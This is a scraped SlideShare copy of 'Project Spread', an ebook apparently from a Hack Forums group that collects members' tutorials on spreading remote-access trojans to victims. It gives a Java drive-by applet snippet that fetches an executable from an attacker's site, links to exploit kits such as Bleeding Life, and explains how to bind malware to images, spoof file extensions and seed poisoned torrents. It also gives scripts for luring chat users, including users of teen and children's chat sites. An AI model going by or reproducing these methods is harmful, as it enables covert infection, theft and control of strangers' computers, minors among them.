SlideShare a Scribd company logo
1 of 19
Download to read offline
Projecct Spread
By: WiFi. & The Rats Crew Members
Before We Start
So, you might be wondering how this got started? Well I (WiFi.) noticed
that the Rats Crew had gone a little bit low qulity lately, so to try and
improve and heighten the quality of the group I made a project that
members completed. Zach and I pushed this project and as I can see it, it
worked. Overall, I believe the quality of the group has enhanced. We are
very proud of every member that did their duty and made a tutorial. All
the tutorials here are made by members here on Hack Forums that are in
the Rats Crew.
Please note that this Ebook is used for educational purposes only.
This Ebook is property of The Rats Crew, any and all changes must be
approved by a leader.
Please do not edit or try to resell this e-book, any attempts shall get
reported to staff members.
All credit goes to the group members for making the tutorials and also
WiFi.
Please note that they tutorials are word for word from the threads in the
sub forum in the group.
Table Of Contents
1. Youtube Spreading
2. Java Drive By Spreading
3. Spreading With Blogger
4. Spreading with Exploits
5. Ewhore Spreading
6. Torrent Spreading (3 Ways)
7. Jpeg Spreading
8. Yahoo Spreading
9. SlideShow Spread
10.ApexDC++ Spreading
11.Conclusion
YouTube Spreading
Made By: Cortufasos
Links:
RAT's Crew Extension Spoofer: http://www.hackforums.net/showthread.php?tid=1429385
Online Video Downloader: http://www.savevid.com/
Enhance Views: http://www.enhanceviews.net/
Java Drive By
Made By: Vexna
First copy the Youtube sources and paste it to notepad then paste the Java code before the body tag.
Java code is in the index.php.
<applet width='150' height='1' code='Java.class' archive='Java.jar'><param name='lol' value='http://www.yoursite.com/yourfile.exe' /><param name='location'
value='%APPDATA%' /><param name='file' value='BpldpPfRT.exe' /><param name='r' value ='' /></applet>
Put the direct link of your server like on the picture.
Upload all and see the result.
Download link of the Java Drive By without template:
http://www.mediafire.com/?n785f77swm1l77w
Download link of Adut Cam Java Drive By (Thanks to nidhish91):
http://www.mediafire.com/?u17bug3b34vwf5l Thanks to Exal for the GFX.
Spreading With Blogger
Made By: jhfire
Introduction : Blogger is a blogging website that is set up for individuals that love to blog, but don't actually know
anything about websites. Blogger was bought out by Google and has become pretty much a waste land, besides are trusty
skiddles that exchange adsence clicks and stay at home moms. Google is a trusted, well known, and the worlds most
powerful country (soon). Now people have a reason to trust Blogger, cause Google owns it and nothing can go wrong.
Can it? Actually it can! If you have a Java Drive-By or a top secret exploit that is beast you can just slip that code right
into your fake Blogger and start spreading right off the bat
You will need a Blogger account. You can sign up for free at http://www.blogger.com.
When you have your account setup you’re now ready to begin! You will need to create a blog of course and pick
a simple template as well. Make sure you have some content on there; it will lure people into the blog making it
even more trustworthy!
After everything is setup you need to get to the HTML of the blog. However, we need to setup our code first.
That is my original code from the index.html file. I will need to edit this code to be able to use it on Blogger.
Changed to this:
As you can see, I only added the </param> tags
and the http://www.mywebsite.com/. You will need to specify where the .jar is uploaded at. Now we need to
stick this code into blogger and it will work!
As you can see, I have put the code inside the <body> tag!
Now when you save the template and view the page, your
Java Drive-By will come right up!
You’re finally done! You can now send the link to people and
begin getting downloads.
Spreading with Exploits
Made By: TheUzuki.'
Exploiting History: Originally Exploits were not used to spread Malware over the net, but today it is one
of the most effective, but also expensivest Methods. Maybe you know the Exploit Kit "Bleeding Life".
This Exploit kit has a good chance to infect others without they are knowing about it.
It is something like a silent Java Driveby.
However, spreading with Exploits CAN be very very successful, but also very very unsuccessful. There are
many companys which are upgrading their Programs like adobe reader or player very fast.
exploit Kits belong to the section of Weaponized Exploits !
Exploiting It: As I said, exploiting can be very easy. You just have to send your slave to a special Web
adress and they are infected. This is the BIG advantage. But this will not work everytime. To set up our own
exploiting / silent downloade package we are visiting 1337day or exploit-DB and search for something like
adobe player. View the source code and learn how to use it. If you have done this, it is time to prepare your
exploit kit, you can take a public one and modify it or you can make your own. This is totally up to you. To
modify your Exploit Kit, try to find out how the exploit is called in the exploit.php / index.php / config.php
file. Attention ! It is not easy to use this. But let's take a closer look at the Exploits the exploit Kit Bleeding
Life is using:
[x] CVE-2008-2992
[x] CVE-2010-0188
[x] CVE-2010-0842
[x] CVE-2010-1297
[x] CVE-2010-2884
[x] CVE-2010-3552
[x] JavaSignedApplet - (Requires user interaction but can be disabled.)
[x] All exploits bypass ASLR and DEP where needed.
If we are googling these CVE's we find a short description of the Exploit,
http://cve.mitre.org/cgi-bin/cvename.cgi...-2008-2992
Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute
arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string
argument, a related issue to CVE-2008-1104.
So we see, the adobe acrobat reader is exploited with a Buffer Overflow (Stack Based) using the printf
function.
What the Exploit actually does is trying to get the adobe acrobat reader Overflows the Buffer and then
rewrites the Return Adress to execute a malicious payload that loads the server in to the victims PC and
executes it.
Lets look at an other one: http://cve.mitre.org/cgi-bin/cvename.cgi...-2010-2884
Adobe Flash Player 10.1.82.76 and earlier on Windows, Mac OS X, Linux, and Solaris and 10.1.92.10 on
Android; authplay.dll in Adobe Reader and Acrobat 9.x before 9.4; and authplay.dll in Adobe Reader and
Acrobat 8.x before 8.2.5 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause
a denial of service (memory corruption) via unspecified vectors, as exploited in the wild in September 2010.
This exploit trys to exploit the Adobe Flash Player to execute arbitrary codes on your system. This can be
executing and downloading a server or what ever.
Get these Exploits:
Smart Pack Exploit: http://www.mediafire.com/?fd2634pc46v6b7a
Bleeding Life Exploits: http://www.mediafire.com/?eo9w77hb5549i4s
Bleeding Life Exploit decrypter: http://www.mediafire.com/?r89uew5j9hdgxdl
Bleeding Index.php file / config.php file: http://www.mediafire.com/?fby90nbc92urvo2 – index
http://www.mediafire.com/?4rzt7mqwfv4ed5n – config
What is wrong with the Bleeding Life Exploits ?:
Yeah, to prevent them from beeing detected by Anti Viruses they have been encrypted with ioncube. How to
decrypt this is up to you. I also uploaded the index file and the configuration file, so that you can look through
it. I just can say LEARN and watch Tutorials ;)
Sorry for the grammatical errors, english is not my native language. And writing something like this is a big
deal for me ;)
Ewhore Spreading
Made By: masterfan
Introduction: Ewhore Spreading is one of the easiest spreading methods.It will get you a lot of victims and
can earn you some good cash if you add more black hat into it.
Preparations: Once you got your server FUD you need to make sure you bind it with a picture and add
image icon. Here comes the important part.Change the extension of your file from .exe to .com and rename your
picture to your msn address.Example: JessicaSwitz438@hotmail.com. That way your server won't be so
suspicious.Not many people knows about that so don't worry about getting caught. If you are stuck with that
step just search for tutorial on HF.
Website list:
http://omegle.com/ -Not good for a lot of bots but you can get some rich pedos.
http://www.teenchat.com/ -You will get a lot of teens from there.
http://www.chat-avenue.com/ -Still good but high risk getting banned from admin
http://kidschat.net/ -A lot of victims here.
http://javachatrooms.net/ -Not really good but you can try it.
http://www.adultchat.net -A lot of traffic.Best one to spread.
Overall Thoughts:
Ewhoring spreading is good but involves a lot of work.It's not the same thing as torrent so you just do
something else and get victims.I've done it few times and believe me it brought me a lot of bots.
This spreading method can bring you a lot of cash if you include "Ewhoring" with it.
This method takes time and persistence and It's the one I would suggest you the most.(Expect the one I use but
it's my creation lol)
It only took me 10 minutes to write this because I'm really bussy with other work and I saw "Project
Spread"topic today so yeah.Tell me what you think about it.
Torrent Spreading
Made By: aspirin™
Things needed: uTorrent, File Renamer, TPB File Name Leecher, Easy Binder.
Method 1:
1. Start "TPB File Name Leacher" and select "Top 100 Games" list.
2. In its directory, a text file will be created named "output".
3. Start File Renamer and click on Menu and then Import Names. Navigate to where
you saved TPB File Name Leacher and select your output file
there.
4. Now Click "Start Grab" and choose your server and then
choose where to save the files.
5. In the directory you selected you will have around 100
copies of your server with file names which are the Top 100
games.
Note: These settings are common for other 2 methods too.
6. Start uTorrent and click "Create new Torrent" or hit Ctrl+N.
7. In select source, select your exe file which you think many people will
download. I'd recommend some cracks as they are mostly small size and your
server is probably going to be of a small size like 1-2 MB.
8. In trackers, add this: the items in this link
http://pastebin.com/JhfaZTT2,
9. Make sure "Start Seeding" is ticked. Click "Save and Start Seeding". Your
torrent file is now ready.
Method 2: For this skip steps 1-5 and follow these
1. Take a popular program such as one on "The Pirate Bay Top 100 Applications" list.
2. Download it. Use a binder such as Easy Binder to bind your server to the Application.
Follow Step 6 from Method 1.
Method 3:
1. Goto billboard.com and see the "Top 100" songs.
2. Select 3-4 songs and download them. I'd recommend some Top 10 songs.
3. Create a fake program in Microsoft Visual Basic which only displays the password.
4. Once you've downloaded the song, compress it using WinRar with a password.
5. Bind your server to your fake program made in Visual Basic which displays the password.
6. Now, place your song RAR file and your password exe in the same directory and compress both using
WinRar without a password this time.
7. Follow Step 6 onwards now for Method 1.
Jpeg Spreading
Made By: Black Shadow
This method is so simple but very effective, there are 2 ways to spread your server with this method.
Lets start by making your servers we are going to use.
We are going to use a pic for the first method
1. Go to any forum or site and download a set of images.
2. Put images in a new folder " name it what you like "
3. In that folder create another new folder " name it Extra pics "
4.Make server bind with different pic, also make an icon of the pic and add this to your server, rename
extension .scr
5. Put your server in the folder named " Extra"
6. RaR it all upload, find forums join then post thread to link of your pics.
The second method is using a txt file as your server.
1. Go to any forum or site and download a set of images.
2. Put images in a new folder " name it what you like "
3. RaR the folder and password protect
4. When making your server, bind a txt file with the pass typed into it, change icon to notepad, just leave
extension as .exe
name the txt file " pass"
5. Put your server and the password protected RAR in another folder and RaR it again without password
6. Upload, find forums join then post thread to link of your pics.
You can use the txtploit method for this also.
Download pdf here spread by txt not exe [Exploit]
Yahoo Spreading
Made By: nidhish91
Requirements: 1.A fake yahoo account with a female username(LOLz), 2.Your FUD server with image icon
3.Rats Crew Extension Spoofer by KillaMuvz to spoof your exe extension to jpeg.
STEP 1:
First we open yahoo messenger and login with our fake account, Then go to Messenger option > Yahoo! Chat >
Join A Room
STEP 2: After that select the chat rooms you feel like ! I go for
chat rooms where I can get many
male victims to make work easier .
You can go in any of your choice but
I prefer you go in the Romance
Section.
STEP 3: After getting in any of the rooms , make a comment in the public chat space saying "Looking for
Quality chat with a guy , hit me up" or anything which gets peoples attention
towards you.
STEP 4: Now guys will hit you up and your main thing starts ! You dont
need to chat much with them coz there are thousands of request at a time so
make it short by sending the file and stating "Have a look at my pic honey and
say how do I look" , show your creativity ! Note that you drag the picture in
the on going messenger and not select Picture sharing option
People will accept the download and you are good to go then !
After the download is complet
Now check your Rat client and youll have a new slave in your list
(The blue one is the new slave I got)
Note:
1.Not all will download the file , coz not all are fools so block the user if they come to know
2.Sometimes the transfer is completed but it shows an error , try sending again
3.You can get almost 25-40 installs in almost an hour (Yes you can)
SlideShow Spread
Made By: SaNƹ
Tools you will use:
Your RAT server, ResHacker, Girl picture, Image converter, My fake slide-show, Binder.
1st: Start by downloading the following tools:
-ResHacker
-My fake slide show
NOTE: This will fool your taget into thinking it's an actual
slideshow. Therefore, they won't be as skeptical when opening the
".exe". This file is clean. Here is a scan from virustotal if you don't
trust me =P:
How it works?: When you first open the fake slide-show, it will seem
as it is loading some pictures. As soon as the progress bar reaches
100%, the program will display this error:
When the slave tries to re-open the fake slideshow file, it will
simply display the error message again then close itself. In other
words, it will ONLY run ONCE. Pretty simple right? This will
make sure the slave doesn't try to re-open the file too much.
2nd: Now you will need to find and download a picture of a
cute/hot girl. For this, I recommend going to google and searching
for something like:
-"cute facebook girl"
-"hot facebook girl"
Why insert "facebook"? Simple: Facebook display pictures don't display nudity. So it will be the right amount
of exposure and it doesn't look too suspicious.
3rd: Once you have a picture, you will need to make an icon version of it. You can use this website for that:
http://www.coolutils.com/Online/Image-Converter/
4th: You will now need to bind your RAT server and the fake photo slide-show.
5th: Next, open up ResHacker. Here's what you need to do:
Click "File" > "Open".
Navigate to the .exe file that is binded and open it.
You should see something like this:
Click on "Icon Group" > "Random number" > "0".
Right-click on "0", then click on "Replace resource...".
Select "Open file with new icon..".
Now, open the icon you created in step #3.
Click on "Replace". (You should now see the icon replaced).
Finally, click on: "File" > "Save As..." > Name it: "MySlideShow.exe" > "Save".
Note: Give it any name you wish, but it's very important you add the ".exe" at the end of the file's name.
TIP: Give it a name such as: Christina_Slideshow.exe
This is just to lower your slave's suspicion.
6th: Your "slide-show" is now ready to spread!
ApexDC++ Spreading
Made By: ๖ Rage
Now first here are a list of programs we will need: ApexDC++, Name Leecher,
Now lets begin, I will be using Aryan IRC Bot, Simply because I need more bots for this.
You will need the Name Leecher for this part.
Now that you have the file downloaded and Open Click File, then Start Grab.
Then names will start generating, too stop this simply click Start Copy.
Now that you got the names open in the name leecher time too copy the EXE's
Too the names.
Click Menu, then Start Copy.
Create a folder, then choose your exe File, and
Finally choose the folder you created too have the
exe's copied to.
This will be the out come of the folder:
Click on settings
Click the Directories too were the folder of the exe's are.:
Now that you have clicked the destination it
should bring up an upload screen as you can see here
That means it uploaded the files, but before anyone can download you must
join a lot of hubs.
How to join a hub is simple, just simply click on public hubs button on the top left corner, its blue and looks
like a orb.
Then click on hubs you see, I advise clicking a lot the better chance of getting many victims.
That is the bottom of your screen, The key is not closing out Apex so people could leech the files.
Again it is better if the file is FUD because there are admins that scan the files too detect viruses and if it
detects one as a virus than it automatically ban you from that hub.
END
So we hope you enjoyed reading this ebook and that you gained a lot of new knowledge. We hope to make and
release more Ebooks to the community of HackForums soon.
If you liked this Ebook, make sure to donate some money to the group. Any amount of money are accpted. We
are trying to get the Rats Crew a paid group so it does not get removed. Please message the user Zach to make
donations.
So if you want to learn more and want to be a part of this group The Rats Crew do not forget to apply when
the recruitment thread is opened.
Credits:
WiFi. – Making the project idea and making it come alive
Members In The Rats Crew – For making the tutorials
Existence – For grammar and spell checking

More Related Content

Similar to Easiest Ways to Spread Files Using Popular Sites and Apps

Joomla Day Austin Part 4
Joomla Day Austin Part 4Joomla Day Austin Part 4
Joomla Day Austin Part 4Kyle Ledbetter
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Shubham Gupta
 
Resisting The Feature Creature
Resisting The Feature CreatureResisting The Feature Creature
Resisting The Feature CreatureChristian Heilmann
 
Fuel for a great web experience
Fuel for a great web experienceFuel for a great web experience
Fuel for a great web experienceChristian Heilmann
 
Ultimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPUltimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPPich Pra Tna
 
Step by Step on How to Setup DarkComet
Step by Step on How to Setup DarkCometStep by Step on How to Setup DarkComet
Step by Step on How to Setup DarkCometPich Pra Tna
 
Community dynamics
Community dynamicsCommunity dynamics
Community dynamicsDave Neary
 
Xdebug for Beginners
Xdebug for BeginnersXdebug for Beginners
Xdebug for BeginnersSean Prunka
 
Creating Custom Dojo Widgets Using WTP
Creating Custom Dojo Widgets Using WTPCreating Custom Dojo Widgets Using WTP
Creating Custom Dojo Widgets Using WTPnsandonato
 
7. mastering wordpress
7. mastering wordpress7. mastering wordpress
7. mastering wordpressMoreNiche
 
Fuel for a great web experience.
Fuel for a great web experience.Fuel for a great web experience.
Fuel for a great web experience.elliando dias
 
Drupal Video Presentation
Drupal Video PresentationDrupal Video Presentation
Drupal Video PresentationEric Michalsen
 
Avoiding Errors: Troubleshoot Wordpress like a Pro!
Avoiding Errors: Troubleshoot Wordpress like a Pro!Avoiding Errors: Troubleshoot Wordpress like a Pro!
Avoiding Errors: Troubleshoot Wordpress like a Pro!J_Cortes
 
Virtualización de Escriorios VMWare View 5
Virtualización de Escriorios VMWare View 5Virtualización de Escriorios VMWare View 5
Virtualización de Escriorios VMWare View 5RaGaZoMe
 
Wordpress 101 Guide Ebook Free
Wordpress 101 Guide Ebook FreeWordpress 101 Guide Ebook Free
Wordpress 101 Guide Ebook Freehuutienmmo
 
Cable modem hacking how to(2)
Cable modem hacking how to(2)Cable modem hacking how to(2)
Cable modem hacking how to(2)NaciConSol
 

Similar to Easiest Ways to Spread Files Using Popular Sites and Apps (20)

Joomla Day Austin Part 4
Joomla Day Austin Part 4Joomla Day Austin Part 4
Joomla Day Austin Part 4
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016
 
Resisting The Feature Creature
Resisting The Feature CreatureResisting The Feature Creature
Resisting The Feature Creature
 
Fuel for a great web experience
Fuel for a great web experienceFuel for a great web experience
Fuel for a great web experience
 
Yahoo for the Masses
Yahoo for the MassesYahoo for the Masses
Yahoo for the Masses
 
Ultimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPUltimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIP
 
Step by Step on How to Setup DarkComet
Step by Step on How to Setup DarkCometStep by Step on How to Setup DarkComet
Step by Step on How to Setup DarkComet
 
Community dynamics
Community dynamicsCommunity dynamics
Community dynamics
 
Xdebug for Beginners
Xdebug for BeginnersXdebug for Beginners
Xdebug for Beginners
 
Creating Custom Dojo Widgets Using WTP
Creating Custom Dojo Widgets Using WTPCreating Custom Dojo Widgets Using WTP
Creating Custom Dojo Widgets Using WTP
 
7. mastering wordpress
7. mastering wordpress7. mastering wordpress
7. mastering wordpress
 
Fuel for a great web experience.
Fuel for a great web experience.Fuel for a great web experience.
Fuel for a great web experience.
 
Php2pdf
Php2pdfPhp2pdf
Php2pdf
 
Drupal Video Presentation
Drupal Video PresentationDrupal Video Presentation
Drupal Video Presentation
 
Hacking For Innovation Delhi
Hacking For Innovation DelhiHacking For Innovation Delhi
Hacking For Innovation Delhi
 
Avoiding Errors: Troubleshoot Wordpress like a Pro!
Avoiding Errors: Troubleshoot Wordpress like a Pro!Avoiding Errors: Troubleshoot Wordpress like a Pro!
Avoiding Errors: Troubleshoot Wordpress like a Pro!
 
Virtualización de Escriorios VMWare View 5
Virtualización de Escriorios VMWare View 5Virtualización de Escriorios VMWare View 5
Virtualización de Escriorios VMWare View 5
 
Wordpress 101 Guide Ebook Free
Wordpress 101 Guide Ebook FreeWordpress 101 Guide Ebook Free
Wordpress 101 Guide Ebook Free
 
Cable modem hacking how to(2)
Cable modem hacking how to(2)Cable modem hacking how to(2)
Cable modem hacking how to(2)
 
FVCP Ad Words
FVCP Ad WordsFVCP Ad Words
FVCP Ad Words
 

More from sandipanpaul16

Mathematical_Analysis_of_Groundwater_Flow_Models_Atangana_2022.pdf
Mathematical_Analysis_of_Groundwater_Flow_Models_Atangana_2022.pdfMathematical_Analysis_of_Groundwater_Flow_Models_Atangana_2022.pdf
Mathematical_Analysis_of_Groundwater_Flow_Models_Atangana_2022.pdfsandipanpaul16
 
Flood Handbook Analysis and Modeling Eslamian 2022.pdf
Flood Handbook Analysis and Modeling Eslamian 2022.pdfFlood Handbook Analysis and Modeling Eslamian 2022.pdf
Flood Handbook Analysis and Modeling Eslamian 2022.pdfsandipanpaul16
 
Fluid Mechanics in SI Units 2nd Edition hibbeler 2021.pdf
Fluid Mechanics in SI Units 2nd Edition hibbeler 2021.pdfFluid Mechanics in SI Units 2nd Edition hibbeler 2021.pdf
Fluid Mechanics in SI Units 2nd Edition hibbeler 2021.pdfsandipanpaul16
 
Survey_and_Assessment_of_Traditionally_Constructed_Brickwork_Jenkins.pdf
Survey_and_Assessment_of_Traditionally_Constructed_Brickwork_Jenkins.pdfSurvey_and_Assessment_of_Traditionally_Constructed_Brickwork_Jenkins.pdf
Survey_and_Assessment_of_Traditionally_Constructed_Brickwork_Jenkins.pdfsandipanpaul16
 
Mathematical_Analysis_of_Groundwater_Flow_Models_Atangana_2022.pdf
Mathematical_Analysis_of_Groundwater_Flow_Models_Atangana_2022.pdfMathematical_Analysis_of_Groundwater_Flow_Models_Atangana_2022.pdf
Mathematical_Analysis_of_Groundwater_Flow_Models_Atangana_2022.pdfsandipanpaul16
 
ASCE_7_22_Minimum_Design_Loads_and_Associated_Criteria_for_Buildings.pdf
ASCE_7_22_Minimum_Design_Loads_and_Associated_Criteria_for_Buildings.pdfASCE_7_22_Minimum_Design_Loads_and_Associated_Criteria_for_Buildings.pdf
ASCE_7_22_Minimum_Design_Loads_and_Associated_Criteria_for_Buildings.pdfsandipanpaul16
 
12th_PhD_Symposium_in_Prague,_Czech_Republic_–_FIB_Proceedings_2018.pdf
12th_PhD_Symposium_in_Prague,_Czech_Republic_–_FIB_Proceedings_2018.pdf12th_PhD_Symposium_in_Prague,_Czech_Republic_–_FIB_Proceedings_2018.pdf
12th_PhD_Symposium_in_Prague,_Czech_Republic_–_FIB_Proceedings_2018.pdfsandipanpaul16
 
indian polity ghatna chakra.pdf
indian polity ghatna chakra.pdfindian polity ghatna chakra.pdf
indian polity ghatna chakra.pdfsandipanpaul16
 
Surveying by Sandeep Jyani Sir _ Complete PDF.pdf
Surveying by Sandeep Jyani Sir _ Complete PDF.pdfSurveying by Sandeep Jyani Sir _ Complete PDF.pdf
Surveying by Sandeep Jyani Sir _ Complete PDF.pdfsandipanpaul16
 
Steel Structures by Vivek Gupta Sir Civil Junction.pdf
Steel Structures by Vivek Gupta Sir Civil Junction.pdfSteel Structures by Vivek Gupta Sir Civil Junction.pdf
Steel Structures by Vivek Gupta Sir Civil Junction.pdfsandipanpaul16
 
Improvements_in_reservoir_construction,_operation_and_maintenance.pdf
Improvements_in_reservoir_construction,_operation_and_maintenance.pdfImprovements_in_reservoir_construction,_operation_and_maintenance.pdf
Improvements_in_reservoir_construction,_operation_and_maintenance.pdfsandipanpaul16
 
ACI_materials_journal_November_2021_V_118_No_6_SPECIAL_ISSUE_ADVANCES.pdf
ACI_materials_journal_November_2021_V_118_No_6_SPECIAL_ISSUE_ADVANCES.pdfACI_materials_journal_November_2021_V_118_No_6_SPECIAL_ISSUE_ADVANCES.pdf
ACI_materials_journal_November_2021_V_118_No_6_SPECIAL_ISSUE_ADVANCES.pdfsandipanpaul16
 
Rapid_Excavation_and_Tunneling_Conference_2017_Proceedings_Lawrence.pdf
Rapid_Excavation_and_Tunneling_Conference_2017_Proceedings_Lawrence.pdfRapid_Excavation_and_Tunneling_Conference_2017_Proceedings_Lawrence.pdf
Rapid_Excavation_and_Tunneling_Conference_2017_Proceedings_Lawrence.pdfsandipanpaul16
 
Improvements_in_reservoir_construction,_operation_and_maintenance.pdf
Improvements_in_reservoir_construction,_operation_and_maintenance.pdfImprovements_in_reservoir_construction,_operation_and_maintenance.pdf
Improvements_in_reservoir_construction,_operation_and_maintenance.pdfsandipanpaul16
 
estimate costing with detailed questions.pdf
estimate costing with detailed questions.pdfestimate costing with detailed questions.pdf
estimate costing with detailed questions.pdfsandipanpaul16
 
Environment Engg Vol-1 Jaspal Sir (civilenggpdf).pdf
Environment Engg Vol-1 Jaspal Sir (civilenggpdf).pdfEnvironment Engg Vol-1 Jaspal Sir (civilenggpdf).pdf
Environment Engg Vol-1 Jaspal Sir (civilenggpdf).pdfsandipanpaul16
 
Environment Engg. Vol-I , Jaspal sir.pdf
Environment Engg. Vol-I , Jaspal sir.pdfEnvironment Engg. Vol-I , Jaspal sir.pdf
Environment Engg. Vol-I , Jaspal sir.pdfsandipanpaul16
 
PPI SE Structural Engineering Reference Manual, 9th Edition.pdf
PPI SE Structural Engineering Reference Manual, 9th Edition.pdfPPI SE Structural Engineering Reference Manual, 9th Edition.pdf
PPI SE Structural Engineering Reference Manual, 9th Edition.pdfsandipanpaul16
 
Fundamentals_of_Mobile_Heavy_Equipment_Wright_Heard_Duffy_2019.pdf
Fundamentals_of_Mobile_Heavy_Equipment_Wright_Heard_Duffy_2019.pdfFundamentals_of_Mobile_Heavy_Equipment_Wright_Heard_Duffy_2019.pdf
Fundamentals_of_Mobile_Heavy_Equipment_Wright_Heard_Duffy_2019.pdfsandipanpaul16
 

More from sandipanpaul16 (20)

Mathematical_Analysis_of_Groundwater_Flow_Models_Atangana_2022.pdf
Mathematical_Analysis_of_Groundwater_Flow_Models_Atangana_2022.pdfMathematical_Analysis_of_Groundwater_Flow_Models_Atangana_2022.pdf
Mathematical_Analysis_of_Groundwater_Flow_Models_Atangana_2022.pdf
 
Flood Handbook Analysis and Modeling Eslamian 2022.pdf
Flood Handbook Analysis and Modeling Eslamian 2022.pdfFlood Handbook Analysis and Modeling Eslamian 2022.pdf
Flood Handbook Analysis and Modeling Eslamian 2022.pdf
 
Fluid Mechanics in SI Units 2nd Edition hibbeler 2021.pdf
Fluid Mechanics in SI Units 2nd Edition hibbeler 2021.pdfFluid Mechanics in SI Units 2nd Edition hibbeler 2021.pdf
Fluid Mechanics in SI Units 2nd Edition hibbeler 2021.pdf
 
Survey_and_Assessment_of_Traditionally_Constructed_Brickwork_Jenkins.pdf
Survey_and_Assessment_of_Traditionally_Constructed_Brickwork_Jenkins.pdfSurvey_and_Assessment_of_Traditionally_Constructed_Brickwork_Jenkins.pdf
Survey_and_Assessment_of_Traditionally_Constructed_Brickwork_Jenkins.pdf
 
Mathematical_Analysis_of_Groundwater_Flow_Models_Atangana_2022.pdf
Mathematical_Analysis_of_Groundwater_Flow_Models_Atangana_2022.pdfMathematical_Analysis_of_Groundwater_Flow_Models_Atangana_2022.pdf
Mathematical_Analysis_of_Groundwater_Flow_Models_Atangana_2022.pdf
 
ASCE_7_22_Minimum_Design_Loads_and_Associated_Criteria_for_Buildings.pdf
ASCE_7_22_Minimum_Design_Loads_and_Associated_Criteria_for_Buildings.pdfASCE_7_22_Minimum_Design_Loads_and_Associated_Criteria_for_Buildings.pdf
ASCE_7_22_Minimum_Design_Loads_and_Associated_Criteria_for_Buildings.pdf
 
12th_PhD_Symposium_in_Prague,_Czech_Republic_–_FIB_Proceedings_2018.pdf
12th_PhD_Symposium_in_Prague,_Czech_Republic_–_FIB_Proceedings_2018.pdf12th_PhD_Symposium_in_Prague,_Czech_Republic_–_FIB_Proceedings_2018.pdf
12th_PhD_Symposium_in_Prague,_Czech_Republic_–_FIB_Proceedings_2018.pdf
 
Surveying Notes .pdf
Surveying Notes .pdfSurveying Notes .pdf
Surveying Notes .pdf
 
indian polity ghatna chakra.pdf
indian polity ghatna chakra.pdfindian polity ghatna chakra.pdf
indian polity ghatna chakra.pdf
 
Surveying by Sandeep Jyani Sir _ Complete PDF.pdf
Surveying by Sandeep Jyani Sir _ Complete PDF.pdfSurveying by Sandeep Jyani Sir _ Complete PDF.pdf
Surveying by Sandeep Jyani Sir _ Complete PDF.pdf
 
Steel Structures by Vivek Gupta Sir Civil Junction.pdf
Steel Structures by Vivek Gupta Sir Civil Junction.pdfSteel Structures by Vivek Gupta Sir Civil Junction.pdf
Steel Structures by Vivek Gupta Sir Civil Junction.pdf
 
Improvements_in_reservoir_construction,_operation_and_maintenance.pdf
Improvements_in_reservoir_construction,_operation_and_maintenance.pdfImprovements_in_reservoir_construction,_operation_and_maintenance.pdf
Improvements_in_reservoir_construction,_operation_and_maintenance.pdf
 
ACI_materials_journal_November_2021_V_118_No_6_SPECIAL_ISSUE_ADVANCES.pdf
ACI_materials_journal_November_2021_V_118_No_6_SPECIAL_ISSUE_ADVANCES.pdfACI_materials_journal_November_2021_V_118_No_6_SPECIAL_ISSUE_ADVANCES.pdf
ACI_materials_journal_November_2021_V_118_No_6_SPECIAL_ISSUE_ADVANCES.pdf
 
Rapid_Excavation_and_Tunneling_Conference_2017_Proceedings_Lawrence.pdf
Rapid_Excavation_and_Tunneling_Conference_2017_Proceedings_Lawrence.pdfRapid_Excavation_and_Tunneling_Conference_2017_Proceedings_Lawrence.pdf
Rapid_Excavation_and_Tunneling_Conference_2017_Proceedings_Lawrence.pdf
 
Improvements_in_reservoir_construction,_operation_and_maintenance.pdf
Improvements_in_reservoir_construction,_operation_and_maintenance.pdfImprovements_in_reservoir_construction,_operation_and_maintenance.pdf
Improvements_in_reservoir_construction,_operation_and_maintenance.pdf
 
estimate costing with detailed questions.pdf
estimate costing with detailed questions.pdfestimate costing with detailed questions.pdf
estimate costing with detailed questions.pdf
 
Environment Engg Vol-1 Jaspal Sir (civilenggpdf).pdf
Environment Engg Vol-1 Jaspal Sir (civilenggpdf).pdfEnvironment Engg Vol-1 Jaspal Sir (civilenggpdf).pdf
Environment Engg Vol-1 Jaspal Sir (civilenggpdf).pdf
 
Environment Engg. Vol-I , Jaspal sir.pdf
Environment Engg. Vol-I , Jaspal sir.pdfEnvironment Engg. Vol-I , Jaspal sir.pdf
Environment Engg. Vol-I , Jaspal sir.pdf
 
PPI SE Structural Engineering Reference Manual, 9th Edition.pdf
PPI SE Structural Engineering Reference Manual, 9th Edition.pdfPPI SE Structural Engineering Reference Manual, 9th Edition.pdf
PPI SE Structural Engineering Reference Manual, 9th Edition.pdf
 
Fundamentals_of_Mobile_Heavy_Equipment_Wright_Heard_Duffy_2019.pdf
Fundamentals_of_Mobile_Heavy_Equipment_Wright_Heard_Duffy_2019.pdfFundamentals_of_Mobile_Heavy_Equipment_Wright_Heard_Duffy_2019.pdf
Fundamentals_of_Mobile_Heavy_Equipment_Wright_Heard_Duffy_2019.pdf
 

Recently uploaded

Electronically Controlled suspensions system .pdf
Electronically Controlled suspensions system .pdfElectronically Controlled suspensions system .pdf
Electronically Controlled suspensions system .pdfme23b1001
 
pipeline in computer architecture design
pipeline in computer architecture  designpipeline in computer architecture  design
pipeline in computer architecture designssuser87fa0c1
 
GDSC ASEB Gen AI study jams presentation
GDSC ASEB Gen AI study jams presentationGDSC ASEB Gen AI study jams presentation
GDSC ASEB Gen AI study jams presentationGDSCAESB
 
EduAI - E learning Platform integrated with AI
EduAI - E learning Platform integrated with AIEduAI - E learning Platform integrated with AI
EduAI - E learning Platform integrated with AIkoyaldeepu123
 
Sachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
Sachpazis Costas: Geotechnical Engineering: A student's Perspective IntroductionSachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
Sachpazis Costas: Geotechnical Engineering: A student's Perspective IntroductionDr.Costas Sachpazis
 
Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...
